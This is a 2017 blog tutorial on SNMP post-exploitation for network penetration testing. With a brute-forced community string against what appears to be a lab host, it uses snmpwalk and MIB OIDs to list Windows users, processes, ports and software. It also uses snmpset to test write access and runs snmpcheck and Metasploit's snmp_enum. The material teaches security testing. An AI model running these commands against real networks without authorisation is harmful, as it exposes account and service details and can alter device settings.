Monday 10 April 2017

Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting



Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting

From our previous post, We have identified the community strings Via Nmap Scan & Brute Forcing the Community String Values.

Now we will see, How can we use those Extracted Community strings for Post Exploitation.

To perform We will use various tools as mention below.

What Is MIB in SNMP

The SNMP Management Information Base (MIB) is a database containing information
usually related to network management. The database is organized like a tree, where
branches represent different organizations or network functions. The leaves of the tree
(final endpoints) correspond to specific variable values that can then be accessed, and
probed, by an external user. To read more about the MIB tree, refer to the following


For example, the following MIB values correspond to specific Microsoft Windows
SNMP parameters.
1.3.6.1.2.1.25.1.6.0        System Processes
1.3.6.1.2.1.25.4.2.1.2     Running Programs
1.3.6.1.2.1.25.4.2.1.4     Processes Path
1.3.6.1.2.1.25.2.3.1.4     Storage Units
1.3.6.1.2.1.25.6.3.1.2     Software Name
1.3.6.1.4.1.77.1.2.25      User Accounts
1.3.6.1.2.1.6.13.1.3        TCP LocalPorts



A) SNAMPWALK
We already got our community strings as "mike", Now we are passing this to SNMPWALK tools followed by out target IP. which will extract the information all possible information from SNMP service.



snmpwalk -v1 -c mike 192.168.131.135



The output is very massive, So i am redirecting the output to a text file.

snmpwalk -v1 -c mike 192.168.131.135 > snmpout.txt



As you can see below, we have tons of output. With some Many MIB Values.




To do some specific search, we can use MIB values in snmpwalk .

snmpwalk  -c <Communitystring> –v1 192.168.11.204 <MIBValues>

In our case community string is - mike

Extracting Windows Users:

snmpwalk  -c mike  -v1 192.168.131.135 1.3.6.1.4.1.77.1.2.25

Extracting Running Windows Processes:

snmpwalk ­‐c mike  ‐v1 192.168.131.135 1.3.6.1.2.1.25.4.2.1.2

Extracting Open TCP Ports:

snmpwalk ‐c mike  ‐v1 192.168.131.135 1.3.6.1.2.1.6.13.1.3

Extracting Installed Software:

snmpwalk ‐c mike  ­‐v1 192.168.131.135 1.3.6.1.2.1.25.6.3.1.2



Now we need to Verify whether this community strings "milke" is Writable or not.To do this we will use a another tool SNMPSET


snmpset -v1 -c mike 192.168.131.135 iso.3.6.1.2.1.1.5.0 s SomeOneWasHere

Here the value "iso.3.6.1.2.1.1.5.0" which have value "bhati" is picked from out snmpwalk output file.


This snmpset -v1 -c mike 192.168.131.135 iso.3.6.1.2.1.1.5.0 s SomeOneWasHere command will go ahead and change the value from "bhati" to "SomeOneWasHere" in SNMP. Lets try this.

Our command succeed.


Now lets Re-Scan our SNMP Target using SNMPWALK

As you can see below, The value has been changed to "SomeOneWasHere".


Now we are confirm that, Our Community String "mike" is Have Write Properties.Now we should move to Next Part of Dumping Some Meal from target machine.


B) SNMPCHECK

snmpcheck tools will uncovered the Important Information of target machine using the community strings "mike" which we have found.

snmpcheck.rb -c mike 192.168.131.135

If you got error while running this command, please see help section of snmpcheck followed by -h, Your version might be older or newer.




C) Metasploit

We can achieve the same information using metasploit auxiliaries.

auxiliary/scanner/snmp/snmp_enum

Fill the required value.



Now just hit "run" and you will see tons of Meal from our target machine.






No comments:

Post a Comment